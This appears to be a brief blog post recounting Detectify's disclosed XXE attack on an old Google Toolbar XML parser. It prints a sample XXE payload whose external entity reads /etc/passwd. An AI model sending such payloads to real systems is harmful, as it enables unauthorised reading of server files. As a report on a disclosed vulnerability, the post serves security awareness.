How we got read access on Google’s production servers posted April 2014

The team at Detectify found a way to access files on one of google's production server. Thanks to an old google product (google toolbar) that was using a poorly secured XML parser.

They just used a simple XXE attack where they uploaded a poisoned xml files and saw what the application printed back

a xxe looks like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

More on their blog

Well done! You've reached the end of my post. Now you can leave a comment or read something else.

Here are some random popular articles:

- Schnorr's Signature and non-interactive Protocols
- Proof of Elgamal's semantic security using a reduction to DDH
- Common x509 certificate validation/creation pitfalls
- Hash-Based Signatures Part I: One-Time Signatures (OTS)
- Database Encryption
- Speed and Cryptography
- What is the BLS signature scheme?

Here are some random recent articles:

- The case against slashing?
- Two And A Half Coins #9 - Tradfi, Banks, SWIFT, CBDCs, with Xavier Lavayssière and Clément Berthou
- A note on the elliptic curve pairing checks in zero-knowledge proofs
- zksecurity.xyz
- Want to learn more about zkBitcoin? I've made some videos
- What's happening in the round 5 of PlonK?
- Zero-knowledge proofs in stateful applications

How we got read access on Google’s production servers posted April 2014

Comments

leave a comment...

How we got read access on Google’s production servers posted April 2014

Comments

leave a comment...

Subscribe to the mailing list